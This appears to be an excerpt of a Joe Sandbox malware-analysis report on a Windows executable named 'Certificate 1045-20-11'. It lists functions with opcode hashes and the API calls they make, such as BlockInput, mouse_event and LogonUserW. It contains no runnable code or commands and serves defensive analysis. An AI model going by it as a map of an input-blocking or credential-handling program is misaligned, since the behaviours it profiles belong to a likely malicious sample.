                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 674341424-0
                                                                                • Opcode ID: a89981784a82ff656c886cc4de915988b65f43bc8080e597d238e8d3a0201784
                                                                                • Instruction ID: 7804c2d1c96cb4b33d4dfca8aee5e265d16817618bb795e3fd047f56e29b1af0
                                                                                • Opcode Fuzzy Hash: a89981784a82ff656c886cc4de915988b65f43bc8080e597d238e8d3a0201784
                                                                                • Instruction Fuzzy Hash: A92254716083199BD724DF28C891BABB7E4FB84314F10492DF99ADB291DB71E944CB82
                                                                                Function 0087038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09f73ae16d65f476a7050e3bc8a63aadf2dc5248546b94d097ea9a2992226944
                                                                                • Instruction ID: b5212b6067fbaf707efbd310eac9cc28b122efd8b949f11e10d3a6c94835d0db
                                                                                • Opcode Fuzzy Hash: 09f73ae16d65f476a7050e3bc8a63aadf2dc5248546b94d097ea9a2992226944
                                                                                • Instruction Fuzzy Hash: 4BB1CF20D2AF414DD62396398871336BB5CBFBB2D6F91D71BFC2A74D66EB2185834180
                                                                                Function 0088B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 0088B6DF
                                                                                  • Part of subcall function 0086344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0088BDC3,00000000,?,?,?,?,0088BF70,00000000,?), ref: 00863453
                                                                                  • Part of subcall function 0086344A: __aulldiv.LIBCMT ref: 00863473
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID:
                                                                                • API String ID: 2893107130-0
                                                                                • Opcode ID: d953670e32e2ea860a57c64e9cf5e6a6f3ea390fb7a5b51ffefa671558129b3b
                                                                                • Instruction ID: b5028a7bbc77634853a0ddaad837c286721ccb47b60bdba0d27a0eb8db21d40c
                                                                                • Opcode Fuzzy Hash: d953670e32e2ea860a57c64e9cf5e6a6f3ea390fb7a5b51ffefa671558129b3b
                                                                                • Instruction Fuzzy Hash: 9F21AF726346108FC729CF38C881A92B7E5EB95310B648E7DE0E5CB2C0CB74BA05DB54
                                                                                Function 00896AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00896ACA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: a5006d955eead93a1e00d66b4f88e4fe3626b0e14cdae52cbc09937845011878
                                                                                • Instruction ID: d93fb8a1ffe0ea37ca0d3264369b6e934bd2806f4ce452e77832a776f55db88d
                                                                                • Opcode Fuzzy Hash: a5006d955eead93a1e00d66b4f88e4fe3626b0e14cdae52cbc09937845011878
                                                                                • Instruction Fuzzy Hash: 81E012352002146FCB00EB59D804D56B7ECFFB4751B04C426F945D7251DAB4F8048B91
                                                                                Function 008874BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008874DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: 50248b0e287794b24c9716c9844162c541f8feebf367f37e83979e0e735669cc
                                                                                • Instruction ID: 7d5694b7ca3bf42fa82017995d2baebd06dcb3ce04bd1c44c9dbf4fbe3bd5702
                                                                                • Opcode Fuzzy Hash: 50248b0e287794b24c9716c9844162c541f8feebf367f37e83979e0e735669cc
                                                                                • Instruction Fuzzy Hash: A9D05EA016C30938EC6837248C0FF760D28F3017C4FB081E9B082C94C3F890D841933A
                                                                                Function 0087B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0087AD3E), ref: 0087B124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: 48cfd918e7067e66ac069505eef778b326c1b4c721c2b0a30cc92927467f274a
                                                                                • Instruction ID: 8757103319329120667fb9d0815cc1f7904222b4f71d1066e8636dbb3ca70232
                                                                                • Opcode Fuzzy Hash: 48cfd918e7067e66ac069505eef778b326c1b4c721c2b0a30cc92927467f274a
                                                                                • Instruction Fuzzy Hash: FBD09E321A4A4EAEDF029FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50
                                                                                Function 008BB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: ebdc879eb1318388d61fecdf886dbadd1d22f9144c0daa2ffc16526404ca6b94
                                                                                • Instruction ID: 689bc3d3525823306dec235fafe7b38f44347a1963462a592c1a434df8a63986
                                                                                • Opcode Fuzzy Hash: ebdc879eb1318388d61fecdf886dbadd1d22f9144c0daa2ffc16526404ca6b94
                                                                                • Instruction Fuzzy Hash: E5C04CB140050DDFC755DBC4C944DEEBBBCBB04305F1050919105F1110D7709B459B72
                                                                                Function 00868189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0086818F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 30796b7edfd96af69acf50c89bfde2854711e0316897a6bf1feb3e1821f045be
                                                                                • Instruction ID: a613100d782e594a8b8e828e96eb881bd19036f0d814a7d5e8852b85090e61a0
                                                                                • Opcode Fuzzy Hash: 30796b7edfd96af69acf50c89bfde2854711e0316897a6bf1feb3e1821f045be
                                                                                • Instruction Fuzzy Hash: B5A0113000020CAB8F002BA2EC088883F2CFA002A0B008022F80C00A20AB32A8208A82
                                                                                Function 0084E3B0 Relevance: .5, Instructions: 540COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2d585505c69018b3565f2fe3916863596593409d13c0023fffaad8770136806
                                                                                • Instruction ID: deb377362b1dbcca69eeda4f3763d678e9630b072c4543e30df3ee1ae404a851
                                                                                • Opcode Fuzzy Hash: e2d585505c69018b3565f2fe3916863596593409d13c0023fffaad8770136806
                                                                                • Instruction Fuzzy Hash: 4F22BC7090421ECFDB24DF58C480AAEB7B0FF58314F15816AE98ADB351E735AD85CB92
                                                                                Function 008493F0 Relevance: .5, Instructions: 531COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca7b02fcbccfdf110168a9c5300abbba33a7debd2790397e4e2163ed9f546928
                                                                                • Instruction ID: 11fd3d23e129d07fe9e72c902e9a7ed4ee5dd352beede955093f482cfe86e915
                                                                                • Opcode Fuzzy Hash: ca7b02fcbccfdf110168a9c5300abbba33a7debd2790397e4e2163ed9f546928
                                                                                • Instruction Fuzzy Hash: 67129A70A0020DAFDF14DFA8D981AEEB7F5FF48300F208569E846E7254EB35A925CB55
                                                                                Function 0084AF50 Relevance: .5, Instructions: 514COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3728558374-0
                                                                                • Opcode ID: a0c6e9aaf037e4a29f83a8165327f14fee073148ffac02a2e7f62d929a943f35
                                                                                • Instruction ID: 7d55d480b70e98df8a0412a2c088c9dde45d7f511b9e7b5c45db5383b2acd78e
                                                                                • Opcode Fuzzy Hash: a0c6e9aaf037e4a29f83a8165327f14fee073148ffac02a2e7f62d929a943f35
                                                                                • Instruction Fuzzy Hash: 52029F70A00209DFCF14DF68D991AAEBBB5FF48310F148469E806EB355EB35DA15CB92
                                                                                Function 008602A4 Relevance: .3, Instructions: 345COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction ID: 17c95b87870c28f89f6b1e3f7226303c47df8bb4caf1fa3b6cfcee9c7599e893
                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction Fuzzy Hash: D1C194322051930ADF2D4639D43543FBAA1EAA17B631B076DD8B3CF5D6EF20D528DA24
                                                                                Function 008606D9 Relevance: .3, Instructions: 341COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction ID: ceca956445032a6bf0e87498538d9809794ea6e599c23aec0cc8ce8601bfa3eb
                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction Fuzzy Hash: 70C1A53220519309DF2D4639943553FBAA1EAA27B631B076DD8B3CF5D6EF20D528DA20
                                                                                Function 0085FE6F Relevance: .3, Instructions: 331COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction ID: ad0d9258352c617e2cc0871504e32c716460b15bf0dcb2ab37dee9684c5c54e8
                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction Fuzzy Hash: 2DC195322051930ADF2D4639943553FBAA1EAA27B631B077DD8B3CF5D6EF10D528DA20
                                                                                Function 0085FA57 Relevance: .3, Instructions: 323COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction ID: c7fecac08b0a6078a47ff8e1d17bca0a4ccacb8f2a02eda972cb3c95910fdb6b
                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction Fuzzy Hash: C4C181322050A709DF2D4639943543EBAA1AAA17B631A077DDDB2CF5D7EE20D52CD620
                                                                                Function 0089A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 0089A2FE
                                                                                • DeleteObject.GDI32(00000000), ref: 0089A310
                                                                                • DestroyWindow.USER32 ref: 0089A31E
                                                                                • GetDesktopWindow.USER32 ref: 0089A338
                                                                                • GetWindowRect.USER32(00000000), ref: 0089A33F
                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0089A480
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0089A490
                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A4D8
                                                                                • GetClientRect.USER32(00000000,?), ref: 0089A4E4
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0089A51E
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A540
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A553
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A55E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0089A567
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A576
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0089A57F
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A586
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0089A591
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A5A3
                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008CD9BC,00000000), ref: 0089A5B9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0089A5C9
                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0089A5EF
                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0089A60E
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A630
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A81D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: e285dbff8416e99425fde8f45a0b7f040a67c88757b71921c37cb1f851aa21b4
                                                                                • Instruction ID: 3ff3cdfeb1ff0a1cdd8d00afc8d5994b5a97acac829dda28ef4d7890ab8d5367
                                                                                • Opcode Fuzzy Hash: e285dbff8416e99425fde8f45a0b7f040a67c88757b71921c37cb1f851aa21b4
                                                                                • Instruction Fuzzy Hash: E6025271500218EFDB14EFA4CD89EAE7BB9FB48710F048158F915EB2A1D770AD41CBA1
                                                                                Function 008AD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 008AD2DB
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008AD30C
                                                                                • GetSysColor.USER32(0000000F), ref: 008AD318
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 008AD332
                                                                                • SelectObject.GDI32(?,00000000), ref: 008AD341
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 008AD36C
                                                                                • GetSysColor.USER32(00000010), ref: 008AD374
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 008AD37B
                                                                                • FrameRect.USER32(?,?,00000000), ref: 008AD38A
                                                                                • DeleteObject.GDI32(00000000), ref: 008AD391
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 008AD3DC
                                                                                • FillRect.USER32(?,?,00000000), ref: 008AD40E
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008AD439
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(00000012), ref: 008AD5AE
                                                                                  • Part of subcall function 008AD575: SetTextColor.GDI32(?,?), ref: 008AD5B2
                                                                                  • Part of subcall function 008AD575: GetSysColorBrush.USER32(0000000F), ref: 008AD5C8
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(0000000F), ref: 008AD5D3
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(00000011), ref: 008AD5F0
                                                                                  • Part of subcall function 008AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008AD5FE
                                                                                  • Part of subcall function 008AD575: SelectObject.GDI32(?,00000000), ref: 008AD60F
                                                                                  • Part of subcall function 008AD575: SetBkColor.GDI32(?,00000000), ref: 008AD618
